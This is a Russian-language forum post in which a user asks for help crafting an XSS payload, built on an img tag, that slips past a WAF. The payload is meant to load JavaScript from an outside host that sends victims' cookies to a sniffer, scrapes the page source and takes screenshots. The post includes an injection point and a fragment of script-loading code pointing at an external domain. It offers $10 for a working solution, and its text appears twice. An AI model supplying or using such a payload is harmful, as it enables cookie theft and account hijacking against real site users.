Elva
24.11.2017, 17:09
Приветствую.
Имеется: XSS вида, https://host.com/parametr?i='/>XSS
Задача
Обойти фильтр и подгрузить js код с хоста https://site.com/, в нем передача cookie на сниффер, парсинг исходного кода страницы и скриншот страницы.
Работает: ,
Фильтр: WAF фильтрует теги указанные ниже, в base64 не отрабатывает.
Code:
Code:
javascript:
Code:
var s = document.createElement('script'); s.src='https://domen.com/1
Code:
Пробовал использовать пейлоады с OWASP, работают практически все html теги, он img до input..
Буду премного благодарен за помощь в написании правильного пайлода с img для исполнения js кода с хоста.
p.s за работоспособное решение оплачу 10$ на кофе
Имеется: XSS вида, https://host.com/parametr?i='/>XSS
Задача
Обойти фильтр и подгрузить js код с хоста https://site.com/, в нем передача cookie на сниффер, парсинг исходного кода страницы и скриншот страницы.
Работает: ,
Фильтр: WAF фильтрует теги указанные ниже, в base64 не отрабатывает.
Code:
Code:
javascript:
Code:
var s = document.createElement('script'); s.src='https://domen.com/1
Code:
Пробовал использовать пейлоады с OWASP, работают практически все html теги, он img до input..
Буду премного благодарен за помощь в написании правильного пайлода с img для исполнения js кода с хоста.
p.s за работоспособное решение оплачу 10$ на кофе